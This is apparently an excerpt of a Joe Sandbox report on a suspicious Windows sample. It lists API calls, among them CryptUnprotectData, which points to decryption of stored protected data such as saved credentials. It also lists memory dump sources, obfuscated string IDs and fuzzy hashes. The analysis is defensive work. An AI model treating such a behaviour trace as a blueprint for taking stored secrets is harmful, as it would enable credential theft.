                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D5F710,00000000,?,002C0E10,00000000,?,00000000,00000000), ref: 002B7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D5F710,00000000,?,002C0E10,00000000,?,00000000,00000000,?), ref: 002B7A7D
                  • wsprintfA.USER32 ref: 002B7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 012f9fb187d989c9063d5e69dc6f360be6cb3f0bf42b924ea94dc3110384fa7b
                  • Instruction ID: e166ef04e4d771177c67e0ba34f396761f7a8113fde306b39ce2782b5f72cacb
                  • Opcode Fuzzy Hash: 012f9fb187d989c9063d5e69dc6f360be6cb3f0bf42b924ea94dc3110384fa7b
                  • Instruction Fuzzy Hash: 5C118EB1945218EBEB209F54DC89FA9BB78FB44721F1043AAEA0A972C0D7742A50CF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: MCF$~.wV$u~%
                  • API String ID: 0-2008623073
                  • Opcode ID: 54697eadaddaac7bef49ccf39335abf5c40617422a8ec55fd3c8c7bdd5ddb6ff
                  • Instruction ID: b1c3180aa2631e29f81b8d7cf3849f567b3596ad6dfef8b7dd075fa29e6f066e
                  • Opcode Fuzzy Hash: 54697eadaddaac7bef49ccf39335abf5c40617422a8ec55fd3c8c7bdd5ddb6ff
                  • Instruction Fuzzy Hash: BDB208F360C2109FE7046E29EC8567ABBE9EF94720F1A893DE6C4C7304E67598058797
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Dkwg$Mhw?$Ss^W
                  • API String ID: 0-2505466677
                  • Opcode ID: 29e878b6cc771aa8128ada1949eaeeabcc8997a4aa3a37673371096e1a3d0a37
                  • Instruction ID: 0cac108ba7ad5d7413b5b635fbea107b3cd9b1f0c0d44bb54d27bbdf2c045c4f
                  • Opcode Fuzzy Hash: 29e878b6cc771aa8128ada1949eaeeabcc8997a4aa3a37673371096e1a3d0a37
                  • Instruction Fuzzy Hash: 7CB22AF3A082149FE304AE2DDC4567ABBE9EF94720F1A493DEAC4C7740EA3558058797
                  APIs
                  • CoCreateInstance.COMBASE(002BE118,00000000,00000001,002BE108,00000000), ref: 002B3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002B37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 43d185d4f47ee5e809fb9dd2ab5efa4d1bd95ce0cb31abed6b7e2476c613065d
                  • Instruction ID: 4c879e519a5753f9178b8ed97226695af198e2d7d1ef798af2e40aaa08621274
                  • Opcode Fuzzy Hash: 43d185d4f47ee5e809fb9dd2ab5efa4d1bd95ce0cb31abed6b7e2476c613065d
                  • Instruction Fuzzy Hash: 8241F870A50A289FDB24DB58CC94BDBB7B5BB48702F4051D8E608EB2D0D7B1AE85CF51
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002A9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002A9BA3
                  • LocalFree.KERNEL32(?), ref: 002A9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: fb014a46ee41fa276b992bd04cd083927e28b1cc1a58ccd1366b786e4d097d53
                  • Instruction ID: a8e49edb6369eb9a119f54b0c4cd4d810cccd1b6cd30456ee4e0224ea708f3db
                  • Opcode Fuzzy Hash: fb014a46ee41fa276b992bd04cd083927e28b1cc1a58ccd1366b786e4d097d53
                  • Instruction Fuzzy Hash: 6C110CB4A00209DFCB04DF94D985AAE77B5FF89304F104568E8159B350D770AE51CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Lap$_Ww
                  • API String ID: 0-1206012690
                  • Opcode ID: a5f84a87de458cd3ecbd753822e5690e1a3265685cd28a3ac3554c0c8e34ea33
                  • Instruction ID: cdbcae2fa511dcda5c2a72cf1f21d0352a7cb7d05928d816299c3ba64f2276cb
                  • Opcode Fuzzy Hash: a5f84a87de458cd3ecbd753822e5690e1a3265685cd28a3ac3554c0c8e34ea33
                  • Instruction Fuzzy Hash: DCA207F3A0C2109FE7146E2DEC8567ABBE9EF94720F1A453DEAC4C7740E63598018796
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: KoS
                  • API String ID: 0-740852584
                  • Opcode ID: 7d39ed1b3b951c2a34cc3213eb9d7928f5e1d699df91ac51dc1e6d88fcdd6eb5
                  • Instruction ID: 489b2a754ab9e8c5ac4551a3ea2d128a01194c5bd0fb6e2f0b23b5ee65d2e00e
                  • Opcode Fuzzy Hash: 7d39ed1b3b951c2a34cc3213eb9d7928f5e1d699df91ac51dc1e6d88fcdd6eb5
                  • Instruction Fuzzy Hash: FCB2F6F360C2049FE304AE2DEC8577ABBE9EF94320F1A463DEAC5C3744E53598058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :;+$zR|;
                  • API String ID: 0-401658067
                  • Opcode ID: fa63f3969900b4630c459ba64c8d416f74fa637058a1679792aa83d582bd2f2b
                  • Instruction ID: a9814f03ebb6453485051dc1d4509529402536bace5862a0eaaff3c293206d9d
                  • Opcode Fuzzy Hash: fa63f3969900b4630c459ba64c8d416f74fa637058a1679792aa83d582bd2f2b
                  • Instruction Fuzzy Hash: D94136B39083108FE3146F28EC8536AFBE5FB94720F1B4A3CDAC453744EA7959448782
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .[
                  • API String ID: 0-2452726844
                  • Opcode ID: 505df7aecf43b210f0a8ae9a2b7a6a8b759221d65ba8f477b50541f4ec52c2e7
                  • Instruction ID: 9dff3960147e115340e09225794bf2d8c4742b852e8124d5f4c90e085c40b218
                  • Opcode Fuzzy Hash: 505df7aecf43b210f0a8ae9a2b7a6a8b759221d65ba8f477b50541f4ec52c2e7
                  • Instruction Fuzzy Hash: B1B178F3A082109BE7049E2CEDC576AB7E5EF94320F2A413DD9C5D7784E67A9805C781
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ]0}
                  • API String ID: 0-3200878567
                  • Opcode ID: 749ea41581d02a3cff68ade3d6b12f4118a3093df758b91d6ad669b0afa9c50a
                  • Instruction ID: 67a47bb84d68aad860cf97e1d20c3f85d09c27c8336f6068ab22388828a75f43
                  • Opcode Fuzzy Hash: 749ea41581d02a3cff68ade3d6b12f4118a3093df758b91d6ad669b0afa9c50a
                  • Instruction Fuzzy Hash: 978155F3E087145BF3046E2DDD9836ABBD6EBC4320F2B863DDAC857784D93858058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: a<<
                  • API String ID: 0-681667818
                  • Opcode ID: ad0452038c9ea7969699009a2f605863f572d34ba8fd86636c97d248251c6ab7
                  • Instruction ID: 35adcc6fa557219fd428c8b08478c337d6fdc9c0a9874c8616106dcc5bc98eec
                  • Opcode Fuzzy Hash: ad0452038c9ea7969699009a2f605863f572d34ba8fd86636c97d248251c6ab7
                  • Instruction Fuzzy Hash: 267158F390C3089FE3047E29ECC577ABBD9EBA4320F16463DD6D483B84E97959058686
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: wf|
                  • API String ID: 0-4182842262
                  • Opcode ID: 11b79c31db2308c480e619092b5a3275f040b07737c7d617cc46c0e4ffd2a112
                  • Instruction ID: 8f95728a68e27d9dc6f06b0e68d4be0ab9eaf3b5cc6927efd20f6dec0a16ab38
                  • Opcode Fuzzy Hash: 11b79c31db2308c480e619092b5a3275f040b07737c7d617cc46c0e4ffd2a112
                  • Instruction Fuzzy Hash: 7941DDF3A182145BE3006D3DEC81766B7DAEBD5271F6B423EE280C7784ED75480A8292
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |1]4
                  • API String ID: 0-195401779
                  • Opcode ID: 832fc818426a694c616dcc55aa8449a33e95fdd5102a69477578864619780326
                  • Instruction ID: 0c4ac9bf79d4611806ff27378c0b6d8712ed68e1b69b719c43c17450eac1959b
                  • Opcode Fuzzy Hash: 832fc818426a694c616dcc55aa8449a33e95fdd5102a69477578864619780326
                  • Instruction Fuzzy Hash: 1551F4B3E043145BE3449E38DC8436AB7D5EF94720F1A863DDE8853B84D9399D0487C6
                  Memory Dump Source
